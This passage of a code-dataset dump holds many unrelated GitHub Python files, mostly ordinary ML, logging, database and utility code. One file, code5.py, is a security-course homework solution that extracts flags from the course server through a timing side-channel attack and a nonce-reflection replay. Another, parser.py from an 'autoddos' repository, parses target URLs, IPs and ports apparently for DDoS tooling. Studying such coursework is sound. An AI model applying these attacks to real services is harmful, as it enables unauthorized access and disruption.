set(expected_sample_names).issubset(set(all_sample_names))\n\n def test_import_same_samples_twice__integrity_error(self):\n handler = GemstoneSubmissionHandler(context=self.handler_context, app=self.app)\n sample_sub_file = self._create_csv_organization_file()\n with self.assertRaises(IntegrityError):\n handler.handle(sample_sub_file)\n handler.handle(sample_sub_file)\n","repo_name":"GitEdvard/commonlims-sandbox","sub_path":"commonlims/test/test_gemstone_sample_submission_csv.py","file_name":"test_gemstone_sample_submission_csv.py","file_ext":"py","file_size_in_byte":4611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40247437209","text":"# -*- coding: utf-8 -*-\nimport os # osモジュールのインポート\nimport MeCab\nfrom gensim import corpora\n\ndef bowTest():\n # さっきITライフハックの1記事を形態素解析かけて名詞取り出したやつ\n words = ['アナタ', 'ブラウザ', 'ブック', 'マーク', 'ブック', 'マーク', '管理', 'ライフ', 'リスト', 'オススメ', '最近', 'ネット', 'サーフィン', '際', '利用', 'の', 'ライフ', 'リスト', 'サイト', 'ライフ', 'リスト', 'ひとこと', '自分', '専用', 'ブックマークサイト', 'ブラウザ', 'スタート', 'ページ', 'ブラウザ', 'ブック', 'マーク', '管理', '不要', '便利', 'サイト', 'の']\n\n # BoW\n dictionary = corpora.Dictionary.load_from_text('livedor_dokujo.txt')\n vec = dictionary.doc2bow(words)\n print(vec)\n\n\n# 2記事の一部だけ取り出しました\n# 1つめがITライフハック、2つめが独女通信の記事です。\nif __name__ == '__main__':\n bowTest()\n","repo_name":"shiratsu/mecabtest","sub_path":"bowTestFirst.py","file_name":"bowTestFirst.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14637558518","text":"import os, glob\nfrom datetime import datetime\nfrom tqdm import tqdm\nimport pandas as pd\nimport numpy as np\nfrom PIL import Image\nimport torch\nfrom torchvision import models, transforms\nfrom torch.utils.data import DataLoader\nfrom torch.autograd import Variable\nfrom torch.nn import Softmax\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"2\" \nfrom torch import nn\n\ntest_file_name = '../data/test.txt'\nbatch_size = 256\nnum_classes = 6\n\n# model_path = '../models/perc98_inception_v3_lr_0.001' + '/*' all_data_res34_lr_0.05 #\nmodel_path = '../models/aug8k_inception_v3_lr_0.001' + '/*'\narch = 'inception_v3'\narch_model = models.inception_v3\noutput_folder = '../submissions'\n\n\nclass Read_Dataset():\n \n def __init__(self, file_path,transform=None):\n self.data = pd.read_csv(file_path, header = None, sep = ' ')\n self.img_path = self.data.iloc[:, 0].tolist() \n self.transform = transform\n \n def __len__(self):\n return len(self.data)\n \n def __getitem__(self, index):\n img_path = self.img_path[index]\n image = Image.open(img_path).convert('RGB')\n \n if self.transform is not None:\n image = self.transform(image)\n \n return img_path, image\n \n \ndef get_dataloader(test_file_name, batch_size=64):\n\n image_datasets = Read_Dataset( file_path = test_file_name, transform = data_transforms)\n\n dataloader = DataLoader(image_datasets, batch_size = batch_size, shuffle=False, num_workers=4)\n\n print ('dataset_size: {}'.format( len(image_datasets) ) )\n return dataloader\n\n \n \ndef get_model(model_path, arch_model, use_gpu = True):\n\n list_of_files = glob.glob(model_path) \n model_file = max(list_of_files, key=os.path.getctime)\n print('path {} and model file {}'.format(model_path, model_file))\n\n model_ft = arch_model(pretrained=True)\n \n if arch_model == models.densenet121:\n model_ft.classifier = torch.nn.Linear(model_ft.classifier.in_features, num_classes)\n \n elif arch_model == models.inception_v3:\n num_ftrs_aux = model_ft.AuxLogits.fc.in_features\n model_ft.AuxLogits.fc = nn.Linear(num_ftrs_aux, num_classes)\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\n \n else:\n model_ft.fc = nn.Linear(model_ft.fc.in_features, num_classes)\n\n checkpoint = torch.load(model_file)\n model_ft.load_state_dict(checkpoint['state_dict'])\n if use_gpu:\n model_ft = model_ft.cuda()\n return model_ft\n\n\ndef softmax(x):\n \"\"\"Compute softmax values for each sets of scores in x.\"\"\"\n e_x = np.exp(x - np.max(x))\n return e_x / e_x.sum()\n \n \ndef get_predictions(model, dataloaders, use_gpu = True):\n \n model_ft.eval()\n results = pd.DataFrame()\n with torch.no_grad():\n \n for i, data in tqdm(enumerate(dataloaders)):\n \n path, inputs = data\n if use_gpu:\n inputs = inputs.cuda()\n \n outputs = model_ft(inputs)\n _, preds = torch.max(outputs.data, 1)\n# outputs, aux = model(inputs)\n \n# preds = outputs.data.cpu().numpy()\n for j in range(outputs.size()[0]):\n# label_name = preds[j].argsort()[-3:][::-1]\n label_name = int( preds[j].cpu().numpy() ) + 1\n prob = softmax (outputs.data[j].cpu().numpy())\n temp = pd.DataFrame({'path': [path[j]], 'category' : [label_name], 'Probablity' : [prob] })\n results = results.append(temp)\n \n return results \n \n \nif __name__ ==\"__main__\":\n\n if arch_model == models.inception_v3:\n data_transforms = transforms.Compose([\n transforms.Resize( (299,299)),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) ])\n \n else:\n data_transforms = transforms.Compose([\n transforms.Resize( (224,224)),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])\n \n\n #getting dataloader\n dataloader = get_dataloader(test_file_name, batch_size)\n \n #loading the model\n model_ft = get_model(model_path, arch_model)\n \n submission = get_predictions(model_ft, dataloader)\n submission['id'] = [x.split('/')[-1].split('.')[0] for x in submission.path]\n \n #writing probablity file \n results_prob = submission[['id', 'category', 'Probablity' ]]\n\n \n filename = f'aug8k_{arch}_prob_{datetime.now().strftime(\"%Y%m%d%H%M%S\")}.csv'\n results_prob.to_csv(f'{output_folder}/{filename}', index=False)\n \n submission = submission[['id', 'category']]\n# submission.Category = [ ','.join([str(x) for x in list(y)]) for y in submission.category.tolist()]\n \n filename = f'aug8k_{arch}_submission_{datetime.now().strftime(\"%Y%m%d%H%M%S\")}.csv'\n submission.to_csv(f'{output_folder}/{filename}', index=False)\n ","repo_name":"sandeep307/PAN_IIT_AI_Hackathon","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":5050,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23472890481","text":"#!/usr/bin/env python\n#coding:utf-8\n\nimport logging\nfrom cloghandler import ConcurrentRotatingFileHandler\n\ntry:\n import thread\n import threading\nexcept ImportError:\n thread = None\n\ntry:\n from utils import generate_trace_id,getHostName\nexcept ImportError:\n from mlog4py.utils import generate_trace_id,getHostName\n\nCRITICAL = logging.CRITICAL\nFATAL = logging.FATAL\nERROR = logging.ERROR\nWARNING = logging.WARN\nWARN = logging.WARN\nINFO = logging.INFO\nDEBUG = logging.DEBUG\nNOTSET = logging.NOTSET\n\n\nclass MLoggerAdapter(logging.LoggerAdapter):\n def process(self, msg, kwargs):\n kwarg = {}\n if 'extra' not in kwarg:\n kwarg[\"extra\"] = self.extra\n\n if 'tags' in kwargs:\n kwarg[\"extra\"]['tags'] = kwargs['tags']\n\n if 'traceid' in kwargs:\n kwarg[\"extra\"]['traceid'] = kwargs['traceid']\n\n if 'spanid' in kwargs:\n kwarg[\"extra\"]['spanid'] = kwargs['spanid']\n\n return msg, kwarg\n\n def setExtra(self,**kwargs):\n if 'tags' in kwargs:\n self.extra['tags'] = kwargs['tags']\n\n if 'traceid' in kwargs:\n self.extra['traceid'] = kwargs['traceid']\n\n if 'spanid' in kwargs:\n self.extra['spanid'] = kwargs['spanid']\n\n def initTraceid(self):\n self.extra['traceid'] = generate_trace_id()\n\nclass MLoger(object):\n def __init__(self, name, level=logging.DEBUG,filename=None):\n self.name = name\n self.filename = filename\n self.level = level\n self.appName = None\n self.traceID = None\n self.spanID = None\n self.tags = None\n self.config = None\n self.logger = None\n self.extra_dict = {\"psm\":'-',\"traceid\": '-', \"spanid\": '-', \"hostname\": '-', \"tags\": '-'}\n self.formatter = \"%(levelname)s|%(psm)s|%(asctime)s.%(msecs)03d+08:00|%(traceid)s|%(spanid)s|%(hostname)s|%(tags)s|%(message)s\"\n\n\n def setBasicConfig(self,*kwargs):\n self.config = kwargs\n\n def setLevel(self,level):\n self.level = level\n\n def setFileName(self,filename,path='/data/logs'):\n self.filename = r\"%s/%s\" %(path,filename)\n\n def setTraceID(self,id):\n self.traceID = id\n\n def setSpanID(self,id):\n self.spanID = id\n\n def setTags(self,tag):\n self.tags = tag\n\n def setAppName(self,app):\n self.appName = app\n\n def loadBasicConfig(self):\n logging.basicConfig(filename=self.filename, level=self.level, format=self.formatter, datefmt='%Y-%m-%dT%I:%M:%S')\n\n def initSession(self):\n for key in self.extra_dict:\n if 'psm' is key:\n self.extra_dict[key] = self.appName\n if 'traceid' is key:\n self.extra_dict[key] = generate_trace_id()\n if 'hostname' is key:\n self.extra_dict[key] = getHostName()\n\n def getLogger(self,name):\n if self.logger is None:\n #self.loadBasicConfig()\n self.initSession()\n logger = logging.getLogger(name)\n logger.setLevel(self.level)\n\n if not logger.handlers:\n th = ConcurrentRotatingFileHandler(filename=self.filename, mode='a', maxBytes=200 * 1024 * 1024, backupCount=8)\n formatter = logging.Formatter(self.formatter,datefmt='%Y-%m-%dT%I:%M:%S')\n th.setFormatter(formatter)\n logger.addHandler(th)\n\n self.logger = MLoggerAdapter(logger, self.extra_dict)\n print(\"logger.handlers: %s\" % logger.handlers)\n\n return self.logger\n\nclass RootLogger(MLoger):\n def __init__(self, level):\n MLoger.__init__(self, \"root\", level)\n\nroot = RootLogger(logging.DEBUG)\n\nif thread:\n _lock = threading.RLock()\nelse:\n _lock = None\n\ndef _acquireLock():\n if _lock:\n _lock.acquire()\n\ndef _releaseLock():\n if _lock:\n _lock.release()\n\n\ndef basicConfig(**kwargs):\n _acquireLock()\n try:\n filename = kwargs.get(\"filename\")\n path = kwargs.get(\"filepath\")\n if filename and path:\n root.setFileName(filename,path)\n else:\n root.setFileName(filename)\n\n level = kwargs.get(\"level\")\n if level is not None:\n root.setLevel(level)\n\n app = kwargs.get(\"app\")\n if app is not None:\n root.setAppName(app)\n\n finally:\n _releaseLock()\n\ndef getLogger(name=None):\n if not name or isinstance(name, str) and name == root.name:\n return root.logger\n return root.getLogger(name)\n","repo_name":"Hoavy/mlog4py","sub_path":"src/mlog4py/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38572102521","text":"import re\n\nfrom spam_units import Unit, IP, Port\n\n\ndef msg_parse_units(message: str) -> [Unit]:\n unit_strs = re.compile(\n r'(https?:\\/\\/[\\w\\-\\.]+\\.\\w{2,5})\\s+?\\n((?:\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\s?\\(.*\\)\\s?\\n)+)',\n re.I | re.M\n ).findall(message)\n\n units = []\n for unit_str in unit_strs:\n unit = Unit(unit_str[0])\n\n ip_strs = re.compile(\n r'(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\s?\\(.*\\)\\s?\\n)',\n re.I | re.M\n ).findall(unit_str[1])\n\n for ip_str in ip_strs:\n parsed_ip = re.compile(r'(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})\\s\\((.*)\\)', re.I).findall(ip_str)[0]\n ip = IP(parsed_ip[0])\n\n port_strs = re.compile(r'(\\d+)/(tcp|udp|http)', re.I).findall(parsed_ip[1])\n\n for port_str in port_strs:\n port = Port(port_str[0])\n port.protocol = port_str[1].lower()\n ip.ports.append(port)\n unit.ips.append(ip)\n units.append(unit)\n\n return units\n","repo_name":"Linguisto/autoddos","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"70486819716","text":"from pwn import *\nimport random\n\ndef flag1():\n def check_flag(s):\n sen = ''\n while 'Timmy' not in sen:\n sen = s.recvline().decode()\n if 'Amy' in sen:\n flag = s.recvuntil('}').decode().split('\\n')[-1]\n return flag\n else: return None\n\n def get_time(s):\n sen = ''\n while 'You' not in sen and 'Timmy' not in sen:\n sen = s.recvline().decode()\n sen = sen.split()[-1]\n minute, second, micro = int(sen[:2]), int(sen[3: 5]), int(sen[-2:])\n second += 60 * (minute)\n micro = second * 10**6 + micro * 10**4\n return micro\n\n def get_len():\n length = 0\n while True:\n length += 1\n s = remote('cns.csie.org', 10224)\n s.sendlineafter('>', '1' * length)\n start = get_time(s)\n end = get_time(s)\n s.close()\n if end - start > 1000: return length\n return None\n\n def get_flag(length):\n ans = '0' * length\n for i in range(length - 1):\n d, m = None, 0\n for digit in '0123456789':\n trial = ans[:i] + digit + ans[i + 1:]\n s = remote('cns.csie.org', 10224)\n s.sendlineafter('>', trial)\n start = get_time(s)\n end = get_time(s)\n s.close()\n if end - start > m:\n m = end - start\n d = digit\n print(f'the {i}-th digit is {d}')\n ans = ans[:i] + d + ans[i + 1:]\n \n for digit in '0123456789':\n trial = ans[:length - 1] + digit\n s = remote('cns.csie.org', 10224)\n s.sendlineafter('>', trial)\n flag = check_flag(s)\n s.close()\n if flag is not None:\n print(f'the number is {trial}')\n return flag\n\n return None\n\n length = get_len()\n if length is None:\n print('something went wrong...')\n exit()\n flag = get_flag(length)\n if flag is None:\n print('something went wrong...')\n exit()\n return flag\n\ndef flag2():\n nonce_table = {}\n nonce = [3599364109]\n\n def get_flag(s, mesg):\n s.sendlineafter('>', mesg)\n while True:\n line = s.recvline().decode()\n if 'CNS' in line:\n return line\n return None\n\n def get_nonce(s, na):\n nonlocal nonce_table, nonce\n s.sendlineafter('>', str(na))\n while True:\n line = s.recvline().decode()\n if 'This is my message' in line:\n nt = int(line.split(':')[-1])\n if nt not in nonce:\n nonce.append(nt)\n elif 'This is the hash' in line:\n h = line.split(':')[-1].strip()\n break\n print(f'inserted {(nt, na)} in table, current size is {len(nonce_table)}')\n nonce_table[(nt, na)] = h\n if (na, nt) in nonce_table and na != nt:\n return (na, nt)\n return None\n\n while True:\n s = remote('cns.csie.org', 10225)\n pair = get_nonce(s, random.choice(nonce))\n if pair is not None:\n flag = get_flag(s, nonce_table[pair])\n return flag\n s.close()\n break\n s.close()\n\nif __name__ == '__main__':\n flag1 = flag1()\n flag2 = flag2()\n print(flag1)\n print(flag2)\n\n \n\n\n\n","repo_name":"cdes5804/NTU_CNS_2020","sub_path":"hw2/code/code5.py","file_name":"code5.py","file_ext":"py","file_size_in_byte":3439,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23394269911","text":"import sys\nimport math\n\ndef is_palendrome(number):\n number_string = str(number)\n return number_string == number_string[::-1]\n\ndef main(argv):\n if len(argv) != 2:\n sys.exit('Usage: python filename.py <input_file> <output_file>')\n with open(argv[0], 'r') as data, open(argv[1], 'w+') as output:\n lines = map(lambda s: s.strip(), data.readlines())\n case = 1\n for line in lines[1:]:\n solution = 0\n range_list = map(int, line.split())\n lower_range_square = int(math.sqrt(range_list[0]-1)) + 1\n upper_range_square = int(math.sqrt(range_list[1]))\n for i in range(lower_range_square, upper_range_square + 1):\n if is_palendrome(i) and is_palendrome(i**2):\n solution += 1;\n output.write(\"Case #{}: {}\\n\".format(case, solution))\n case += 1\n data.close()\n output.close()\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_118/2288.py","file_name":"2288.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10059291499","text":"import mysql.connector as sq\nimport numpy as np\nfrom data import *\nimport random as rd\nimport pickle as pk\nimport os, math\n\ndef addleveldata(tileset):\n leveldata = []\n def add(x, y, obj, sp = {}):\n nonlocal leveldata\n if obj.isdigit():\n leveldata.append([x, y, sp.get('w', -1), sp.get('h', -1), obj, sp])\n else:\n tempimg = tileset[obj]\n leveldata.append([x, y, tempimg[1], tempimg[2], obj, sp])\n def addrow(x, y, obj, sp, length):\n w = tileset[obj][1]\n for i in range(length):\n add(x + w * i, y, obj, sp)\n def addcol(x, y, obj, sp, length):\n h = tileset[obj][2]\n for i in range(length):\n add(x, y + h * i, obj, sp)\n ###\n add(395, 400, 'grassLedgeLeft.png', {'coll': 0})\n add(1030, 400, 'grassLedgeRight.png', {'coll': 0})\n for i in range(14):\n addrow(400, 400 + i * 70, 'grassCenter.png', {'coll': 0, 'dark': 100}, 9)\n addrow(400, 400, 'grassHalfMid.png', {'coll': 'up', 'front': 1}, 9)\n ###\n add(820, 190, 'grassHillLeft.png', {'coll': 'tri'})\n add(890, 190, 'grassHillLeft2.png', {})\n add(890, 120, 'grassHillLeft.png', {'coll': 'tri'})\n add(960, 120, 'grassHillLeft2.png', {})\n add(960, 50, 'grassHillLeft.png', {'coll': 'tri'})\n add(960, 190, 'grassCenter.png', {})\n add(1030, 50, 'grassMid.png', {})\n add(1030, 120, 'grassCenter.png', {})\n add(1030, 190, 'grassCenter.png', {})\n add(1100, 50, 'grassCliffRight.png', {})\n ###\n addrow(540, 610, 'grassHalfMid.png', {'coll': 'up', 'front': 1}, 10)\n ###\n for i in range(3):\n addcol(1030 + i * 70, 610, 'grassCenter.png', {'coll': 0, 'dark': 100}, 6)\n ###\n add(540, 190, 'grassHillRight.png', {'coll': 'tri2'})\n add(470, 190, 'grassLeft.png', {})\n ###\n add(0, 0, '2', {'txt': \"Why, hello there\", 'size': 100, 'colour': blue, 'front': 1})\n ###\n add(750, 820, 'grass.png', {'move': 'sin', 'sinpower': 2, 'sinlength': 300, 'sinvalue': 0, 'sintemp': 750, 'vel': 0, 'axis': 0})\n l = np.array(leveldata)\n l = np.append(l, l[:, :2], axis = 1)\n return l\n\n\ndef connect(raw_ = True):\n global con, cur\n con = sq.connect(user = 'root', host = 'localhost', passwd = mysql_password, allow_local_infile = True, db = 'game_server', raw = raw_)\n cur = con.cursor()\n\ndef createleveltable_old():\n global con, cur\n cur.execute('create table {} (l_id int, x int, y int, w int, h int, obj varchar(30), sp varchar(200))'.format('levels'))\n\ndef createtables():\n global con, cur\n cur.execute('create database if not exists game_server')\n cur.execute('create table if not exists {} (l_no int, l_data longblob)'.format('level_data'))\n cur.execute('create table if not exists {} (id int, level_name varchar(30), creator varchar(30), play_count int, published varchar(3))'.format('game_data'))\n cur.execute('create table if not exists {} (username varchar(30), password varchar(30))'.format('users'))\n \ndef export(leveldata, lno):\n global con, cur\n connect(True)\n pickled_data = pk.dumps(leveldata)\n cur.execute('delete from level_data where l_no = %s', (lno,))\n cur.execute('insert into level_data values (%s, %s)', (lno, pickled_data))\n con.commit()\n con.close()\n\ndef new(lno):\n global con, cur\n connect(True)\n pickled_data = pk.dumps(np.array([]))\n cur.execute('insert into level_data values (%s, %s)', (lno, pickled_data))\n con.commit()\n con.close()\n\ndef set_publish(state, lno):\n connect(False)\n cur.execute('update game_data set published = %s where id = %s', (state, lno))\n con.commit()\n con.close()\n\ndef importleveldata(lno):\n global con, cur\n connect(True)\n cur.execute('select * from level_data where l_no = {}'.format(lno))\n data = cur.fetchall()\n data = data[0][1]\n data = pk.loads(data)\n data = np.array(data)\n con.close()\n return data\n \ndef export_old(leveldata, lno):\n global con, cur\n leveldata = np.insert(leveldata, 0, lno, axis = 1)\n os.chdir(os.path.dirname(__file__))\n np.savetxt('data.csv', leveldata, delimiter = ';', fmt = '%s')\n cur.execute('set global local_infile = 1')\n cur.execute('delete from levels where l_id = {}'.format(lno))\n cur.execute('load data local infile \"{}\" into table {} fields terminated by \";\" lines terminated by \"\\n\"'.format(os.path.join(os.getcwd(), 'data.csv'), 'levels'))\n con.commit()\n con.close()\n os.remove('data.csv')\n \ndef importleveldata_old(lno):\n global con, cur\n if not con.is_connected():\n connect()\n cur.execute('select * from levels where l_id = {}'.format(lno))\n data = cur.fetchall()\n for i in range(len(data)):\n data[i] = list(data[i])\n data[i].pop(0)\n for j in range(4):\n data[i][j] = int(data[i][j])\n data[i][5] = eval(data[i][5])\n data = np.array(data)\n data = np.append(data, data[:, :2], axis = 1)\n return data\n\ndef get_published(lno):\n global con, cur\n connect(False)\n cur.execute('select published from game_data where id = %s', (lno,))\n temp = cur.fetchall()\n con.close()\n return temp[0][0]\n \n \ndef publish(lno):\n global con, cur\n connect(False)\n cur.execute(\"update game_data set published = 'yes' where id = %s\", (lno,))\n con.commit()\n con.close()\n\ndef unpublish(lno):\n global con, cur\n connect(False)\n cur.execute(\"update game_data set published = 'no' where id = %s\", (lno,))\n con.commit()\n con.close()\n\n\n","repo_name":"rithik-raja/platform-game","sub_path":"leveldata_retriever.py","file_name":"leveldata_retriever.py","file_ext":"py","file_size_in_byte":5496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17273209817","text":"import librosa\nimport librosa.display\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import specgram\n\ndef LoadAudioFiles(filePath):\n rawSound=[]\n for fp in filePath:\n X,SampleRate =librosa.load(fp)\n rawSound.append(X)\n return rawSound\n\n \ndef getAudioPaths():\n filePathList=[]\n rootPath=os.getcwd()\n f= os.path.join(rootPath,'ESC-50-master')\n classDirNames=[ name for name in os.listdir(f) if os.path.isdir(os.path.join(f,name))]\n for subDirName in classDirNames:\n #print(subDirName)\n fileRootPath=os.path.join(f,subDirName)\n filePath=[ name for name in os.listdir(fileRootPath) if os.path.isfile(os.path.join(fileRootPath,name))]\n for xx in range(len(filePath)-1):\n #print(os.path.join(fileRootPath,filePath[xx])) \n filePathList.append((subDirName, os.path.join(fileRootPath,filePath[xx])))\n return filePathList\n\n\ndef plotWave(soundName,rawSound):\n hfig=plt.figure()\n i=1\n for n,f in zip(soundName,rawSound):\n plt.subplot(10,1,i)\n librosa.display.waveplot(np.array(f),sr=22050)\n plt.title(n.title())\n i +=1;\n plt.show()\n\ndef plotSpecgram(soundName,rawSound):\n i=1\n # hfig=plt.figure(figsize=(25,60),dpi=900)\n hfig=plt.figure()\n for n,f in zip(soundName,rawSound):\n plt.subplot(10,1,i)\n specgram(np.array(f),Fs=22050)\n plt.title(n)\n i+=1\n #plt.subtitle(\"Figure 2: Spectrogram\",x=0.5, y=0.915,fontsize=18)\n plt.show()\n","repo_name":"sunnypiggggy/dcnn","sub_path":"DCNN/audioFileUtility.py","file_name":"audioFileUtility.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43206956502","text":"import sys\ninput = sys.stdin.readline\n\nNEXT = 2\nDATA = 1\nPREV = 0\n\ndef dll_processor(operations):\n\n front = None\n end = None\n\n for o in operations:\n if o[0] == \"insert\":\n front, end = insert(front, end, o[1])\n elif o[0] == \"delete\":\n front, end = delete(front, end, o[1])\n elif o[0] == \"deleteFirst\":\n front, end = delete_first(front, end)\n elif o[0] == \"deleteLast\":\n front, end = delete_last(front, end)\n\n return get_list(front)\n\ndef get_list(front):\n if not front:\n return []\n\n l = []\n target = front\n while True:\n l.append(target[DATA])\n if not target[NEXT]:\n break\n target = target[NEXT]\n return l\n\ndef insert(front, end, target):\n node = [None, target, None]\n if front:\n front[PREV] = node\n node[NEXT] = front\n return node, end\n else:\n return node, node\n\ndef delete(front, end, target):\n\n delete_node = front\n while not delete_node[DATA] == target:\n delete_node = delete_node[NEXT]\n if delete_node == None:\n return front, end\n\n if delete_node[PREV] == None:\n delete_node[NEXT][PREV] = None\n return delete_node[NEXT], end\n elif delete_node[NEXT] == None:\n delete_node[PREV][NEXT] = None\n return front, delete_node[PREV]\n else:\n delete_node[NEXT][PREV] = delete_node[PREV]\n delete_node[PREV][NEXT] = delete_node[NEXT]\n return front, end\n\ndef delete_last(front, end):\n\n if not end[PREV]:\n return None, None\n else:\n end[PREV][NEXT] = None\n return front, end[PREV]\n\ndef delete_first(front, end):\n\n if not front[NEXT]:\n return None, None\n else:\n front[NEXT][PREV] = None\n return front[NEXT], end\n\ndef main():\n n_list = int(input())\n target_list = [input().split() for i in range(n_list)]\n print(*dll_processor(target_list))\n\nif __name__ == \"__main__\":\n main()","repo_name":"MutsuOno/AOJ","sub_path":"ALDS1/3_C_DoublyLinkedList2.py","file_name":"3_C_DoublyLinkedList2.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25211892025","text":"from datetime import datetime\nimport json\nimport os\n\nfrom cryptography import x509\nfrom cryptography.hazmat.backends import default_backend\nimport ssl\nimport socket\n\nimport util\nimport util_def\n\n\ndef parse_date(date):\n # Convert the original date string to a datetime object\n dt = datetime.strptime(date, \"%b %d %H:%M:%S %Y %Z\")\n\n # Format the datetime object to the desired format\n formatted_date = dt.strftime(\"%b %d %Y\")\n\n return formatted_date\n\n\n\ndef calc_duration(start, end):\n start = parse_date(start)\n end = parse_date(end)\n\n # Convert the date string to a datetime object\n start = datetime.strptime(start, \"%b %d %Y\").date()\n end = datetime.strptime(end, \"%b %d %Y\").date()\n\n num_days = (end - start).days\n return num_days\n\n\n\ndef get_certificate_signature_algorithm(cert):\n cert_object = x509.load_der_x509_certificate(cert, default_backend())\n signature_algorithm = cert_object.signature_algorithm_oid._name\n return signature_algorithm\n\n\ndef determine_port_from_website_protocol(url):\n if url.startswith(\"http://\"):\n return 80\n \n if url.startswith(\"https://\"):\n return 443\n\n\n# Extracts and saves the TLS/SSL certificate info of the url if available\ndef extract_certificate_info(website_url, folder_path):\n error_tag = \"Connection Error\"\n port = determine_port_from_website_protocol(website_url)\n\n # Create a socket\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n # Get the hostname from the url\n hostname = util.extract_hostname(website_url)\n if hostname is None:\n status = \"Failed\"\n print(\"Error extracting certificate info...\")\n return status\n \n\n # Wrap the socket with SSL/TLS\n context = ssl.create_default_context()\n with context.wrap_socket(sock, server_hostname=hostname) as ssock:\n try:\n # Establish a connection to the website\n ssock.connect((hostname, port))\n\n # Get the TLS certificate information\n cert = ssock.getpeercert()\n cert_binary = ssock.getpeercert(binary_form=True)\n\n # Extract certificate details\n subject = dict(x[0] for x in cert[\"subject\"])\n alt_subject= cert[\"subjectAltName\"]\n issuer = dict(x[0] for x in cert[\"issuer\"])\n version = cert[\"version\"]\n not_before = cert[\"notBefore\"]\n not_after = cert[\"notAfter\"]\n valid_period = calc_duration(not_before, not_after)\n serial_number = cert[\"serialNumber\"]\n signature_algorithm = get_certificate_signature_algorithm(cert_binary)\n protocol_version = ssock.version()\n\n except Exception as e:\n print(\"Cert Extraction Error: \", e)\n subject = {\n \"commonName\": error_tag,\n \"organizationName\": error_tag,\n \"localityName\": error_tag,\n \"stateOrProvinceName\": error_tag,\n \"countryName\": error_tag,\n \"businessCategory\": error_tag,\n \"serialNumber\": error_tag,\n \"jurisdictionState\": error_tag,\n \"jurisdictionLocality\": error_tag,\n }\n\n issuer = {\n \"countryName\": error_tag,\n \"organizationName\": error_tag,\n \"organizationalUnitName\": error_tag,\n \"commonName\": error_tag,\n }\n version = error_tag \n not_before = error_tag \n not_after = error_tag \n valid_period = error_tag \n serial_number = error_tag \n signature_algorithm = error_tag\n protocol_version = error_tag\n alt_subject = [error_tag]\n \n finally:\n ssock.close()\n \n data = {\n \"website url\": website_url,\n \"hostname\": hostname,\n \"subject\": subject,\n \"issuer\": issuer,\n \"version\": version,\n \"not_before\": not_before,\n \"not_after\": not_after,\n \"valid_period\": valid_period,\n \"serial_number\": serial_number,\n \"signature_algo\": signature_algorithm,\n \"protocol_version\": protocol_version,\n \"alternate subject name\": alt_subject\n }\n\n json_file_output_path = os.path.join(folder_path, util_def.FILE_CERT)\n util.save_data_to_json_format(json_file_output_path, data)\n \n print(\"Certificate info saved.\")\n status = \"Success\"\n \n return status\n","repo_name":"Py0000/Playwright_Crawler","sub_path":"src/crawler_certificate_extractor.py","file_name":"crawler_certificate_extractor.py","file_ext":"py","file_size_in_byte":4623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"356165723","text":"import copy\n\n# Demo libs\nimport spiga.demo.analyze.extract.processor as pr\n\n\nclass VideoAnalyzer:\n def __init__(self, tracker, processor=pr.EmptyProcessor()):\n self.tracker = tracker\n self.processor = processor\n self.tracked_obj = []\n\n def process_frame(self, image):\n image = copy.copy(image)\n self.tracked_obj = self.tracker.process_frame(image, self.tracked_obj)\n if len(self.tracked_obj) > 0:\n self.tracked_obj = self.processor.process_frame(image, self.tracked_obj)\n self.tracked_obj = self._add_attributes()\n return self.tracked_obj\n\n def plot_features(self, image, plotter, show_attributes):\n for obj in self.tracked_obj:\n image = obj.plot_features(image, plotter, show_attributes)\n return image\n\n def get_attributes(self, names):\n\n # Check input type\n single_name = False\n if isinstance(names, str):\n names = [names]\n single_name = True\n\n attributes = {}\n for name in names:\n attribute = []\n for obj in self.tracked_obj:\n attribute.append(obj.get_attributes(name))\n attributes[name] = attribute\n\n if single_name:\n return attribute\n else:\n return attributes\n\n def _add_attributes(self):\n for obj in self.tracked_obj:\n if not obj.has_processor():\n obj.attributes += self.processor.attributes\n obj.attributes += self.tracker.attributes\n obj.drawers.append(self.processor.plot_features)\n obj.drawers.append(self.tracker.plot_features)\n return 